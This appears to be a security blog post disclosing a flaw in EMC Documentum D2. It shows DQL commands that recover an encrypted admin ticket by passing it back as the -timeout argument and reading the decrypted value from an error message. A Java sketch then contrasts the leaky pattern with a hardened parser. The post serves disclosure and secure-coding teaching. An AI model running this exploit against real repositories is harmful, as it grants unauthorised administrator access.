God bless EMC. Part IV

Previously I wrote about a security vulnerability in D2's D2GetAdminTicketMethod method. Starting from the 4.2 release EMC has changed the behaviour of D2 methods: D2 now encrypts the method arguments and the return value that are passed through the c6_method_return object:

1> create c6_method_return object set message='test'
2> go
object_created
----------------
00002f0a8000291d
(1 row affected)
1> execute do_method with method='D2GetAdminTicketMethod',
2> arguments='-docbase_name d242 -password "" -method_return_id 00002f0a8000291d
3> -scope global -timeout 3600'
4> go
...
(1 row affected)
1> select message from c6_method_return where r_object_id='00002f0a8000291d'
2> go
message
----------------------------------------------------------------------------
[encrypted base64 value omitted]
(1 row affected)

So now we get some garbage instead of a ticket.

Is it possible to decrypt that garbage?
YES! Note how the encrypted string is passed as the integer argument (-timeout) and D2 complains that it is not an integer, echoing the value it failed to parse:

1> update c6_method_return object
2> set parameter_name[0]='-timeout',
3> set parameter_value[0]=(select message from c6_method_return
4> where r_object_id='00002f0a8000291d')
5> where r_object_id='00002f0a8000291d'
6> go
objects_updated
---------------
              1
(1 row affected)
[DM_QUERY_I_NUM_UPDATE]info:  "1 objects were affected by your UPDATE statement."

1> execute do_method with method='D2GetAdminTicketMethod',
2> arguments='-docbase_name d242 -password "" -method_return_id 00002f0a8000291d
3> -scope global'
4> go
...
(1 row affected)

1> select error from c6_method_return where r_object_id='00002f0a8000291d'
2> go
error
----------------------------------------------------------------------------
For input string: "DM_TICKET=T0JKIE5VTEwgMAoxMwp2ZXJzaW9uIElOVCBTIDAKMwpmbGFncyBJTlQ
(1 row affected)
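The leak shown above is a classic pattern: an exception message that embeds the offending input ("For input string: ...") is copied verbatim into a caller-readable error field. As an added illustration, not D2's own code (which is not on this page), here is a hypothetical Java argument parser with the leaky pattern beside a hardened one; the class and method names and the ReturnObject stand-in for c6_method_return are assumptions.

```java
import java.util.Map;

// Hypothetical sketch of the argument-parsing step of a server method,
// not D2's actual code. Names (MethodArgs, ReturnObject) are assumed.
public final class MethodArgs {

    // Stand-in for the error attribute of a c6_method_return-style object.
    public static final class ReturnObject {
        public String error;
    }

    // Leaky: NumberFormatException.getMessage() is 'For input string: "<raw>"',
    // so whatever was decrypted into -timeout is copied into the error field
    // and becomes readable by anyone who can read the return object.
    public static int parseTimeoutLeaky(Map<String, String> args, ReturnObject ret) {
        try {
            return Integer.parseInt(args.get("-timeout"));
        } catch (NumberFormatException e) {
            ret.error = e.getMessage();
            return -1;
        }
    }

    // Hardened: report only which parameter failed, never its value. The
    // length is as much as a caller needs for troubleshooting.
    public static int parseTimeoutSafe(Map<String, String> args, ReturnObject ret) {
        String raw = args.getOrDefault("-timeout", "3600");
        try {
            int v = Integer.parseInt(raw);
            if (v <= 0 || v > 86400) {
                ret.error = "-timeout out of range";
                return -1;
            }
            return v;
        } catch (NumberFormatException e) {
            ret.error = "-timeout is not an integer (" + raw.length() + " chars)";
            return -1;
        }
    }

    public static void main(String[] argv) {
        // Constructed input standing in for a decrypted ticket string.
        Map<String, String> args = Map.of("-timeout", "DM_TICKET=<decrypted ticket here>");
        ReturnObject leaky = new ReturnObject();
        parseTimeoutLeaky(args, leaky);
        System.out.println("leaky: " + leaky.error);
        ReturnObject safe = new ReturnObject();
        parseTimeoutSafe(args, safe);
        System.out.println("safe:  " + safe.error);
    }
}
```

The same rule applies to any field that non-administrators can read back: error text should name the parameter and the failure class, not reproduce the rejected value.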
